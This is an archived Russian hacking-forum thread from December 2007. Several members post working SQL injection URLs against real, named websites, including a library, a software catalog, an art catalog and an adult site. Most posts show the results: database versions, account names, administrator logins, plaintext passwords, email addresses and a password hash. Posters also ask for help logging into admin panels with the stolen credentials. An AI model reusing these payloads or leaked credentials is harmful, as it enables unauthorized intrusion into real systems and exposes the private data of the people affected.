ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4191  
Старый 26.12.2007, 21:37
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

www.smolbibl.ru
Цитата:
http://www.smolbibl.ru/news.php?Action=FullText&ID=270+union+select+1,con cat_ws(0x3a,User,UserName,UserAccess,UserPass,User Mail,UserFamily)+from+users+limit+0,1/*
5.0.45-community
Admin:Андрей:5:dtkbrj,hbnfybz:anmmat@mail.ru :Метелица
login:Admin
pass:dtkbrj,hbnfybz

http://www.smolbibl.ru/admin.php
но пароль не подходит ... не знаю что делать ((
 
Ответить с цитированием

  #4192  
Старый 26.12.2007, 23:41
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию

http://soft.oszone.net

Код HTML:
http://soft.oszone.net/program.php?pid=-30+UNION+SELECT+1,2,3,4,5,6,7,8,9,concat(version(),0x3a,user(),0x3a,database()),11,12,13,14,15,16,17,18,19,20,21,22,23/*
4.1.22-log:bigmac_soft@localhost:bigmac_soft
 
Ответить с цитированием

  #4193  
Старый 27.12.2007, 01:42
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

http://www.europa.fm/ru/index.html?c=about&id=-1+union+select+1,2,3,4,concat_ws(0x2F,cast(version ()+as+binary),cast(database()+as+binary),cast(user ()+as+binary)),6,7,8/*

4.1.14-standard/europa/europa@localhost

-----------------------------------------------------------------------------
art-catalog.ru

http://www.picture.art-catalog.ru/artist.php?id_artist=-4+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5/*

4.1.22-log/artcata8_artcatalog/artcata8_Bos37ar@localhost



http://www.picture.art-catalog.ru/artist.php?id_artist=-4+union+select+1,concat_ws(0x2F,user_login,user_pa ssword,email),3,4,5+from+users/*

логин/пароль/мейл
valent/valent46/maler@bk.ru
 
Ответить с цитированием

  #4194  
Старый 27.12.2007, 04:14
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию

SexSecrets.ru ^ ^
Код:
http://sexsecrets.ru/index.php?r=menlogic&id=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4+--+
5.0.26:sexsecrets_ru@localhost:sexsecrets_ru

Таблицка:
phpbb_users
Столбцы:
user_id
username
user_password

Код:
http://sexsecrets.ru/index.php?r=menlogic&id=-1+union+select+1,concat_ws(0x3a,user_id,username,user_password),3,4+from+phpbb_users+limit+1,1/*
Код:
2:Admin:be245c9762fe4ae6f40bbf944e0de243
 
Ответить с цитированием

  #4195  
Старый 27.12.2007, 13:28
Mike 007
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215

Репутация: 86
По умолчанию

http://www.dovodchiki-dorma.ru/links/?cat=-1+union+select+user()/*

Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'


http://www.tsaritsyno.ru/main.jsp?id=-1+order+by+3/*
 
Ответить с цитированием

  #4196  
Старый 27.12.2007, 13:34
heks
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
Провел на форуме:
1484154

Репутация: 126
Отправить сообщение для heks с помощью ICQ
По умолчанию

http://www.taniec.ilife.pl/para.php?id=-1+order+by+2/*
 
Ответить с цитированием

  #4197  
Старый 27.12.2007, 13:45
Mike 007
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215

Репутация: 86
По умолчанию

www.onboard.ru
Код:
http://www.onboard.ru/resort/?id=-1+union+select+user()/*

Код:
http://s1912.zouo.ru/site.php?id=-1+union+select+user(),2,3/*

Последний раз редактировалось Mike 007; 27.12.2007 в 13:52..
 
Ответить с цитированием

  #4198  
Старый 27.12.2007, 14:05
Saint-Sky
Участник форума
Регистрация: 14.07.2007
Сообщений: 108
Провел на форуме:
1888785

Репутация: 305
По умолчанию

Цитата:
Сообщение от heks  
http://www.taniec.ilife.pl/para.php?id=-1+order+by+2/*
Эта запись ни о чем не говорит, ведь столбцов то - 4.


Код:
http://www.taniec.ilife.pl/para.php?id=-1+UNION+SELECT+1,2,3,concat(user(),0x3a,database(),0x3a,version())/*
taniec_adner@localhost:taniec_taniec:4.1.22-standard
 
Ответить с цитированием

  #4199  
Старый 27.12.2007, 15:08
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

http://dctel.net/index.php?page=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4/*

4.0.23a-log/dctel/dctel_user@localhost

-----------------------------------------------------------------------------

http://www.arbicon.ru/news/?id=-1+or+1=@@version--

Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 1)

http://www.arbicon.ru/news/?id=-1+or+1=(select+db_name())-- portal

http://www.arbicon.ru/news/?id=-1+or+1=(select+system_user)-- portal
 
Ответить с цитированием

  #4200  
Старый 27.12.2007, 16:32
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

www.glukometr.ru
Цитата:
http://www.glukometr.ru/article.php?action=ViewArticle&ID=360+union+select +1,login,3,pass,5+from+users/*
5.0.45-community
login:admin
pass:123
де админка ненаю ((
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ